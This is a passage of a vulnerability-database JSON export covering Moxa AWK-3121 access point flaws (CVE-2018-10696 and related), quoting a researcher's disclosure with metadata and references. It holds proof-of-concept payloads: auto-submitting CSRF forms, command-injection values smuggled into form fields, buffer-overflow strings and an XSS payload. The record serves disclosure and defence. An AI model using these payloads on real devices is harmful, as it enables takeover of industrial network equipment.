to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. The POST parameter \"srvName\" is susceptible to this\n injection. By crafting a packet that contains shell metacharacters,\n it is possible for an attacker to\n execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. The POST parameter \"iw_privatePass\"\n is susceptible to this injection. By crafting a packet that contains shell metacharacters,\n it is possible\n for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. However, the same functionality allows an attacker\n to execute XSS by injecting an XSS payload. The POST parameter\n \"iw_board_deviceName\" is susceptible to this injection. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. The POST parameter \"iw_filename\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 162 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. The POST parameter \"iw_filename\" is susceptible to command\n injection via shell metacharacters. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. The POST parameter \"iw_serverip\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 480 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10696"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015616"
},
{
"db": "VULHUB",
"id": "VHN-120481"
},
{
"db": "VULMON",
"id": "CVE-2018-10696"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10696",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015616",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-324",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120481",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10696",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120481"
},
{
"db": "VULMON",
"id": "CVE-2018-10696"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015616"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10696"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-324"
}
]
},
"id": "VAR-201906-0786",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120481"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:04.025000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10696"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015616"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120481"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015616"
},
{
"db": "NVD",
"id": "CVE-2018-10696"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10696"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120481"
},
{
"db": "VULMON",
"id": "CVE-2018-10696"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015616"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10696"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-324"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120481"
},
{
"db": "VULMON",
"id": "CVE-2018-10696"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015616"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10696"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-324"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120481"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10696"
},
{
"date": "2019-06-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015616"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.497000",
"db": "NVD",
"id": "CVE-2018-10696"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-324"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-11T00:00:00",
"db": "VULHUB",
"id": "VHN-120481"
},
{
"date": "2019-06-11T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10696"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015616"
},
{
"date": "2019-06-11T14:39:34.740000",
"db": "NVD",
"id": "CVE-2018-10696"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-324"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-324"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Device cross-site request forgery vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015616"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-324"
}
],
"trust": 0.6
}
}
VAR-201906-0790
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.19 devices. It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection. Moxa AWK-3121 The device contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The 'iw_board_deviceName' parameter in Moxa AWK-3121 version 1.19 has a cross-site scripting vulnerability. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log).
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
